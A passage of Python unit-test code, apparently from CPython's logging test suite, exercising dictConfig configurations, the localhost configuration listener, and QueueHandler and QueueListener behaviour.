'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
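    # config9a/config9b are incremental configurations: with 'incremental'
    # set to True, dictConfig() does not replace existing handlers or loggers
    # but only adjusts levels (and, for loggers, propagate).  That is why
    # config9a (handler still at WARNING) produces no output in
    # test_config_9_ok, while config9b (handler lowered to INFO) does.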
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
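    # In config11 the 'cfg://' values are resolved against this same dict:
    # 'cfg://true_formatters' points at the mapping stored under that key, and
    # 'cfg://handler_configs[hand1]' indexes into it.  The resolution rules
    # are exercised directly in test_baseconfig below.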
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
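    # The '.' key in config14's handler entry lists extra attributes that
    # dictConfig() sets on the handler after it has been constructed, which is
    # what test_config14_ok checks via h.foo and h.terminator.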
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
    # Configuration with a custom class that does not inherit from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t)
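    # setup_via_listener speaks the protocol expected by logging.config.listen():
    # a 4-byte big-endian length prefix followed by the configuration text
    # (JSON for dictConfig or ini-style text for fileConfig).  If a verify
    # callable was given, the received bytes are passed through it (and may be
    # transformed or rejected) before the configuration is applied.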
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
    def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
        # Deep-copy so that mutating the nested formatter dict below does not
        # leak into the shared class-level configuration.
        config = copy.deepcopy(self.custom_formatter_class_validate)
        config['formatters']['form1']['style'] = "$"
        # No exception should be raised, as 'validate' is configured to False
        self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
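        # 'cfg://' references resolve against the configuration dict: dotted
        # attribute-style access, [index] and [key] lookups are all supported,
        # and string entries inside converted containers are resolved as well
        # (so nest3's 'cfg://alist' element compares equal to alist below).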
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
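    # UTC observes no DST, so the DST offset is the same zero offset.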
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
